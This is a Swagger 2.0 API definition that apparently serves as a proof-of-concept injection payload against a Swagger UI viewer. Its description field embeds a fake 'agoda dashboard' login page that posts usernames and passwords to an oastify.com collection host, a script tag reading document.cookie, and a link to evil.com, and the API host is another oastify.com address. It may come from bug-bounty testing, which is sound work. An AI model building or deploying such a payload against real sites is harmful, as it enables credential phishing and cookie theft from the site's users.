swagger: '2.0'
info:
  version: 'v1'
  title: adjust Login Verification.
  description: '<div class="login-form">
    <div class="heading">
    <img  src="https://profile-photos.hackerone-user-content.com/variants/pzo90pdnx9c1c49701o4wnsx08zk/66555439a92cf3e7dc0339d5fb79b6624a23d8919c96c34859e2df0522f0278e" >
        <h1>welcom to agoda dashboard : Plese  Login First  </h1>
 <h2>for login enter your credintials bellow</h2>
        <script>alert(document.cookie)</script>
        <a href='https://evil.com/' >Visit our Hotels Site</a>
        <link href='https://cdn6.agoda.net/cdn-accom-web/js/assets/browser-bundle/AVENGERS-1679=A&PER-9231=A/3402-e4984b598588.css' rel='stylesheet' onerror='loadErrorHandler.call(this, event)'/>
    </div>
    <div class="form-container">
        <form action="https://awa2hiq4gwx9ghz11jyothla218swik7.oastify.com/" method="post" class="form-signin">
            <div class="form-group">
                <label for="username">Username</label>
                <input type="text" name="username" size="20">
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" name="password" size="20">
            </div>
            <div class="form-group">
                <button type="submit" class="btn btn-default">Login</button>
            </div>
        </form>
    </div>
</div>'
host: gey5dsm80j2kkp622gw42mght8zznxbm.oastify.com

paths:

  /{Username}/{Password}:
    post:
      summary: Logs in
      parameters:
        - name: Username 
          required: true
          in: path
          type: string
        - name: Password 
          required: true
          in: path
          type: string
      responses:
        200:
          description: Login was successful
